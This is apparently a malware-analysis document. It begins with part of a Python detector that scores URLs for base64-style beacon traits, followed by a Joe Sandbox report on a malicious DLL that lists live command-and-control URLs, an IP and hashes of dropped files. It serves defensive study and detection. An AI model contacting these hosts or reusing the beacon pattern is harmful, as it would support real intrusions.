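def try_decode(payload):
    """Base64-decode with padding restored; None when the text is not valid base64.

    For this family the request body is encrypted before it is encoded, so a
    successful decode only confirms the path is well-formed base64.
    """
    padded = payload + "=" * (-len(payload) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except ValueError:
        return None


def score_url(url, min_segments=6, min_avg_len=8):
    """Number of matching indicators, 0..4."""
    segs = _segments(url)
    if not segs:
        return 0
    joined = _joined(segs)
    cleaned = joined.replace("_2B", "+").replace("_2F", "/")
    return sum([
        len(segs) >= min_segments,
        TOKEN.search(joined) is not None,
        B64_ALPHABET.match(cleaned) is not None,
        sum(map(len, segs)) / len(segs) >= min_avg_len,
    ])


def is_beacon(url, threshold=3):
    return score_url(url) >= threshold


# Taken from the report's Contacted URLs table.
REPORT_URL = ("http://museumistat.bar/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/"
              "1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/"
              "xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/"
              "R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk")
# Also from the table; note the token split across '..._/2F...'.
STRADDLE_URL = ("http://museumistat.bar/drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/"
                "mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/"
                "zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/"
                "_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk")
# Constructed benign URLs for comparison (not from the report).
BENIGN_URLS = ["http://museumistat.bar/favicon.ico", "http://example.com/images/logo.png"]

if __name__ == "__main__":
    for u in [REPORT_URL, STRADDLE_URL] + BENIGN_URLS:
        print(score_url(u), is_beacon(u), u[:60])
```

Decoding only proves the path is well-formed base64; the bytes remain ciphertext, so the decoder is there to confirm the normalization, not to read the request. The leading directory ("drew") and the extension (".jlk") vary between builds, which is why neither is hard-coded as an indicator and the favicon request from the same host scores below the threshold.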

                  URLs from Memory and Binaries

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8 | regsvr32.exe, 00000004.00000003.346708342.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.353643418.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.346671708.0000000002F63000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://constitution.org/usdeclar.txt | loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
                  http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
                  http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
                  http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb | regsvr32.exe, 00000004.00000003.333637218.0000000002F52000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.333810799.0000000002F62000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                  Contacted IPs


                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  31.41.44.3 | museumistat.bar | Russian Federation | 56577 | ASRELINKRU | false

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:555803
                  Start date:19.01.2022
                  Start time:11:49:17
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 18m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:status.dll
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of new started processes analysed:55
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winDLL@80/93@8/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 20.7% (good quality ratio 19.7%)
                  • Quality average: 80.9%
                  • Quality standard deviation: 28.1%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .dll
                  • Override analysis time to 240s for rundll32
                  Warnings:
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 23.203.70.208, 152.199.19.161
                  • Excluded domains from analysis (whitelisted): autosblogs.com, ie9comview.vo.msecnd.net, autosblogs.co, ctldl.windowsupdate.com, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, go.microsoft.com.edgekey.net, resolver1.opendns.com, watson.telemetry.microsoft.com, cs9.wpc.v0cdn.net
                  • Execution Graph export aborted for target mshta.exe, PID 2948 because there are no executed functions
                  • Execution Graph export aborted for target mshta.exe, PID 6100 because there are no executed functions
                  • Execution Graph export aborted for target mshta.exe, PID 620 because there are no executed functions
                  • Execution Graph export aborted for target mshta.exe, PID 6304 because there are no executed functions
                  • Not all processes were analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: status.dll

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  11:50:19 | API Interceptor | 2x Sleep call for process: loaddll32.exe modified
                  11:50:51 | API Interceptor | 224x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{09BDEB58-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):11264
                  Entropy (8bit):2.808654052006259
                  Encrypted:false
                  SSDEEP:96:BfGQXUkDwwpX8seKPVDpXk6Yv+8SYVyeKPVDpXk6Yv+8SwV+QfkDwwpX83SY+8S:NRV
                  MD5:81001C037EE82D956ADA214746439455
                  SHA1:2F957CAFB38C3ECBE736A7CB07E44EA9F6DF392B
                  SHA-256:E7D05C7E3DFDEC49FAC8FD8D346DA708B8201AAF5898C0392D638C63875E07B6
                  SHA-512:010493DF5A5CA425CE4E7005FB479BDAF8C7BAF3E376CD3C0BB5437AA6E2C347DA343D163B757746FED87991E4B43119DB1E09C45173FEB40E1FDCA7F2DD9E5C
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... nX.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t...............................................................................................................O._.T.S.W.e.u.9.C.W.F.5.7.B.G.Q.6.e.z.0.u.4.Y.t.7.Q.=.=.........:.......................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB5A-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2883784054968714
                  Encrypted:false
                  SSDEEP:24:rsjGDGij9lRk6N1XY/Ak/Gcl1JNHyOu8Fq6oQlEB2:rsjGDGiFk6fXYDGcvTVFqXwEB
                  MD5:98762F84BA947A8B98D168C662845903
                  SHA1:09E493F6DF0885779D6CCAE16B41C7450A5E4B63
                  SHA-256:8C1A6CC5A54BB3CF5EE4E232A60C24E8FE8965B42BADD837BE5706000AAF6578
                  SHA-512:F79EF9CABDF76453FDEA837E79DDA9FAEBF2F8FE9D96DCF0BE8D7EAA15D61CDB91C96FF1A19FF35E88A4056C50CDC65BBFC5A57DF5809CDDEB6DAAAD40476797
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB5C-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3171449337294754
                  Encrypted:false
                  SSDEEP:24:rKG/2G+j9llHJ8+N1A9T2GKATRO0GlZlcYJsXmMUHGCr:rKGOG+JHJ3frl+X0HG
                  MD5:59045127F7CBD13C6640B02163D3886E
                  SHA1:590C9FB1957690BCD7F70ABB7AF91AB004A9BA6A
                  SHA-256:08462F2396EE2BF35C13A3786E3CB8C3B23A6BF68B1311D02EA9AF7EDD6F81FC
                  SHA-512:967DE6340AFB1D1B444BC93D67C4434B5CAD981B95C2FDCECD7CB15279456A679E1771DEFB4B59D2EC83D9DF54B1C1E19A64300ACC188AF879176CB4895D0B39
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y......................................................................................... Ld.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................D.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB5E-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.289904298490222
                  Encrypted:false
                  SSDEEP:24:rSGOAGK9lxPkN1X7s5Fc6lyxez/OLemyKmb9+/F/nubpy:rSGOAG8PkfX7s7cu9myK49+/
                  MD5:FD5538DD35AE13E374C945DB0FE8FA59
                  SHA1:709E39CA6C932B7199CA13267B97C6B76A97E62D
                  SHA-256:5BBD8340E79D13E1DE86A5A380E6237BB4CF841AC0DD304624578652B0845244
                  SHA-512:B58F6D1F5DD918F495F7E2F2DF82A49554EE7C29DC584BA7198AA5A4CC89A0C1799DD05CE4F5299677D389F86AA2E2516AC2664C4FAF56C734239BAA1725DAFD
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p.v.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB60-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.295205175884244
                  Encrypted:false
                  SSDEEP:24:rZGO0Gi9lRniIN19lL+JK7wuKCG9y3U4r0EAKaBplyTX:rZGO0G0iIfz+W483Br00SL
                  MD5:3FD94D5CBD9C22B4A2F6D3217CE0690C
                  SHA1:07A25B3100E8C7381328E2320E2819E8C48C0F12
                  SHA-256:76F17C851CEED723F1B5BC62819CE87CCE659F72B5E6BFFAACC97D8D13786252
                  SHA-512:F5533C0741F64EF734B62C092F45B1C9C2BB547FFB941FF5C1490F5E1B6027A236C89A9A3AE50ED10BC3E1B9D37C9769A88B63E3216DC38D2F020F21B6857550
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`.}.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BDEB62-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.312258841574338
                  Encrypted:false
                  SSDEEP:24:riG2bGy9llqwN1DOaGIpmkG7apgpqN6S:riG2bGAqwfDONI/6pA
                  MD5:EB136AEC041CF4EA40F169AB749492F2
                  SHA1:C0CCD6D1FC26E1BA41B4A6EE9A63984401B302FF
                  SHA-256:24BD87EDA3EA9A94C8CF1E3EF4AD6366C588E84D559DF074A2075B52E900FBFC
                  SHA-512:88DF2E565142AD3F31398F739A093703F9A81CA1FED5E18D0163B486DF1BA5D03947E6560B2D92ACA29D3944B367A65CFEB0BE10CBD6C1228593004BA9075B17
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................0H..m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0416-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2950261946606005
                  Encrypted:false
                  SSDEEP:24:rzGiVGm9l8T2ON1LZhqJ7kO59UwZgFC4fX65:rzGiVGr2OfFhC7kO3ZgEK
                  MD5:90D53045C3B7CC78EC1DF90776FA18FA
                  SHA1:3F0CF28BC2C97327D06CE73DEAC4E09749E1695A
                  SHA-256:C2867DF53A37A91BB360F5A2651AB502230F1E8D9C32D537654E2246FF4FA2F8
                  SHA-512:465EB6C1340C1B8533769AFD282D7413F52061D0C5EA75BF172C8A35A2BD758CD8A812DA9BC2163E866F8EC4C910307311FC02DC86B6491BAC83519A30292176
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p...m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0418-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.3023371410053706
                  Encrypted:false
                  SSDEEP:24:rrGXGi9lRSIN13McPRoiaPwgjVF6JOIFLony6Xe60h:rrGXG0SIf3MqoRPZoLqyz60
                  MD5:A0158AAE1DC44302468601BCCE705D61
                  SHA1:952A0063DED8FCB8D1C9D53246EF37F7BD5E2D3C
                  SHA-256:12FAD69507A192DBF10EEC8B96217A106D404F6CE0318DE033949655AFD93CD0
                  SHA-512:64DCFC114A262DAA38C9D089459245FFCC2A8133650FD5E20E3BC633DDF73DB19DA688979978D57008B2923F8982541E9BD778C5E0D502B38CD1BDD4CBE4F9A3
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED041A-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2994511521519128
                  Encrypted:false
                  SSDEEP:24:rYIGdGKj9lsEod2N1wcOq8Fg8deNlKjXb63MHbTV:rVGdGKZod2fbONBF
                  MD5:9A967D1F04EF15D2782E84B49ECB1EA1
                  SHA1:AF7F5B8E9D06580E087D58DF71EACA5E443FEBE2
                  SHA-256:4EC0452A500DD1F0A47ACB84A6E0ECE4E7F78EDBDA452ACDB0037B2B1699F37F
                  SHA-512:83952F71317BA61CC6970110AE041054A8A9E8D0463546081A5F3056223199EB8FA3F7C5B01FAE2A7DF19E164CF418FF686F9C4AE7FBFA3C104815E35C6849A4
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................8.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED041C-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.306547404475649
                  Encrypted:false
                  SSDEEP:24:rkGhlIGi9lRZIN1zIlDkqGGqh7SFEwEr+84:rkGzIG0ZIfzYDoDh7SSBr
                  MD5:325D2017DAA31B81286F66BFF06DB3C5
                  SHA1:5BB0131E451378A99B2382C20A29589B194EAFB9
                  SHA-256:5AEAA8D1E67B328141F648BEF6955532F160AC9FC264591FD2D1A0302F0F6A9C
                  SHA-512:F88702E476A16E75DC096668E5332C343CB1383DAF2DC5138599FF8AE18AABCC01F079B0B2342AAF9912250D10C49A16BCA7D41601910A3B102A42529EA77AF8
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p..m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................$.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED041E-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.2981524474519928
                  Encrypted:false
                  SSDEEP:24:r9jGiQIGm9l8Tfb2NON1Z8NtzjbJBVleaTMg3PYW5KygBW:r9jGiQIGrmOfZcLlBMg3tKyg
                  MD5:A180972D696EE08A02107CE93E7D82AF
                  SHA1:C36D287CC67C833F72B5345B85EDCC3F7647682A
                  SHA-256:900C6DD8CD99C3E4932F14D69111277901D07FE368ED7F6306060D1283B3BB96
                  SHA-512:7B074092D409A29DB2B62016A8A7E482238A9E32E30D6E6821A6153691DFD9BBE2DFDBD9BACCBB72D2B28D039ACB857468E875FD50DD865BEBE9B0DF781BF8EE
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................@.!.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................(.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0420-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.295278688132882
                  Encrypted:false
                  SSDEEP:24:rVGkGij9lRg6N1A+IU8kayvvqydgCm61Vo4:rVGkGiFg6fTIUogvBdDN1Vo
                  MD5:885FC86A763E7D7F46944BA56953917C
                  SHA1:E411EE227F0AC830F76256720EBA2320A85F0A14
                  SHA-256:7275D8709350C8BD3F4BAD12EFD7BB6328937857AA7E366C3806BF637B90BD74
                  SHA-512:92091DAAFF31C921BFD4B134DBD4861F44A5232F7BEFB1AFCCF36FF64B5F5BD6F9A4590E5742E2CBDE6C48A61F342330BA62CB1B68A292AA9D261215A412A10E
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.......................................................................................... H.m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8....................................................... .......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0FED0422-7961-11EC-90E9-ECF4BB862DED}.dat
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):2.311509983566947
                  Encrypted:false
                  SSDEEP:12:rlxAFZJrEgmfep7fFaFrEgmfY7qFI9lIqat0vwN1YWSUltKbrD4DevGl/7xJiw/Z:rAG2aGy9llvwN1ZfKi7xxZQQ20
                  MD5:6E81154BFA009D8E5BE36EBF76AD0483
                  SHA1:21E3570E678E33DE69993E602A7A70D9B490172E
                  SHA-256:C04A92C36C873F128A98DABA8FBB9843E5DB0F933D0223E95734F71DA04B1315
                  SHA-512:C4919341CCA7660DDBF17AA4BC487EF504E4E7ACEC595D66F2B160B0CB69D1BDA5DC87B466A92120BE7D908C7617EAF4C80F36AD17E561E288DE289354708D34
                  Malicious:false
                  Reputation:unknown
                  Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y............................................................................................m.................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g.......................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\61e7ecf72c368[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):315596
                  Entropy (8bit):5.9999382485815005
                  Encrypted:false
                  SSDEEP:6144:ovasBgj02Aq4mu85onKq7NDl3ypsoVYEJZ1VmrhI/1xO6JXeokUr4VGISRRQ:LsBg9Aj17tl309LJZ1VmuLlZzLRRQ
                  MD5:BBBD8E91C179E72AA7B70F9916CB0936
                  SHA1:B200CB57C1AC573FF2895A4EBBD2D38C0A11CFC3
                  SHA-256:94527A5DD418CC8C12477427079E1AC1F89190DD4B0D7A4BE394668B0842608F
                  SHA-512:D3DF50CA9183081E0534A37B7993AEF4524A18F0EF9CD80B692ECC9A9BDBA4AB3274335F1CAE4471CB239015C4EA2D48D228C8A20F8D05D6FF877888FBEFF122
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\61e7ecff6e9a1[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):315596
                  Entropy (8bit):5.9999382485815005
                  Encrypted:false
                  SSDEEP:6144:ovasBgj02Aq4mu85onKq7NDl3ypsoVYEJZ1VmrhI/1xO6JXeokUr4VGISRRQ:LsBg9Aj17tl309LJZ1VmuLlZzLRRQ
                  MD5:BBBD8E91C179E72AA7B70F9916CB0936
                  SHA1:B200CB57C1AC573FF2895A4EBBD2D38C0A11CFC3
                  SHA-256:94527A5DD418CC8C12477427079E1AC1F89190DD4B0D7A4BE394668B0842608F
                  SHA-512:D3DF50CA9183081E0534A37B7993AEF4524A18F0EF9CD80B692ECC9A9BDBA4AB3274335F1CAE4471CB239015C4EA2D48D228C8A20F8D05D6FF877888FBEFF122
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\61e7ed0289129[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):2416
                  Entropy (8bit):5.9908312607114445
                  Encrypted:false
                  SSDEEP:48:wZi+Rwg9hTol/gkze+JOu/JVe/a2v7RHvztNVmedx2LXOqO:R+XDolbzNOG52zphHm0x2TXO
                  MD5:79CA0C4D7826B90D41F415CC96D7BC11
                  SHA1:724874697500F122ED0DAD92CDD31B3D15A40B6E
                  SHA-256:341AB2761AC6AE8232F11602705B1A955C48100E11C19A80AF50CEA91C347D5A
                  SHA-512:F4CA14A81AC477DFF8B7163E5068CEAB3B29B0DDF47F33A9141148E7F4BCA8FAB852F3276A58E0EBD7A26C55A1580C935BE50DD72E8623FFAB6148251A0A0D44
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\61e7ecfc9b07f[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):246652
                  Entropy (8bit):5.999799526591325
                  Encrypted:false
                  SSDEEP:3072:ZJQG7/2X/uzTIESoK9IWI1uQLvNZPailZ9RcOwvsHoVqYrLY7yUfMqWlpOF2AKhJ:Zr2XssogcLvnPBZ9/wvsIHnwUB3UUJZ
                  MD5:4F48695EA7A9FFBD212435D95F2E145A
                  SHA1:358796D62FB21B6749AE151A4D89A42E64727F80
                  SHA-256:D7E95FCEAC8DC9B9F4C29CFADF743643010E3D063A467C54FCFB08C305B98A07
                  SHA-512:A581FD6A760C11D0260492D5274ADC186640EBC23F5205FF66264EE5FB07C8A773651CA30F679DA6B30C72B04CEEA9FE86424B04AF10D89557CC8C802941C81E
                  Malicious:false
                  Reputation:unknown
                  Preview:
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\61e7ecfd1c2f6[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
